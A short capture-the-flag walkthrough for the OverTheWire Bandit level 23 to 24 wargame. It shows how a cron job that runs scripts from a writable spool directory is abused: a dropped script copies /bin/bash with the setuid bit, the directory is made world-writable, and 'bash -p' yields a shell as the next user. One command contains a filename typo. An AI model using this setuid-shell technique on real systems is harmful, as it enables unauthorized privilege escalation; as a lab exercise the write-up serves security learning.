Bandit Level 23 β†’ Level 24

cat /etc/cron.d/cronjob_bandit24

If we read it:

cat /usr/bin/cronjob_bandit24.sh

So it will execute all scripts in the /var/spool/bandit24/foo directory everyone minute, and then delete everything. So lets write a simple bash script that will copy /bin/bash binary to another file and give it setuid bit, and we will place it in the /tmp/Caesar3 directory:

mkdir /tmp/Caesar3
cd /tmp/Caesar3
vim script.sh

:wq
cat script.sh
#!/usr/bin/bash

cp /bin/bash /tmp/Caesar3/bash; chmod u+s /tmp/Caesar3/bash
chmod +x script.sh
cp script.h /var/spool/bandit24/foo/
ls /var/spool/bandit24/foo/script.sh

Also we give everyone the permission to write in that directory we just created:

chmod 777 /tmp/Caesar3

As we can see here is the bash binary, and we can execute it as the user bandit24:

./bash -p

Here is the password for the next user.

Note: Check for the script for instance every 30 seconds, if it was deleted, just copy it again, and wait.

PreviousBandit Level 22 β†’ Level 23NextBandit Level 24 β†’ Level 25

Last updated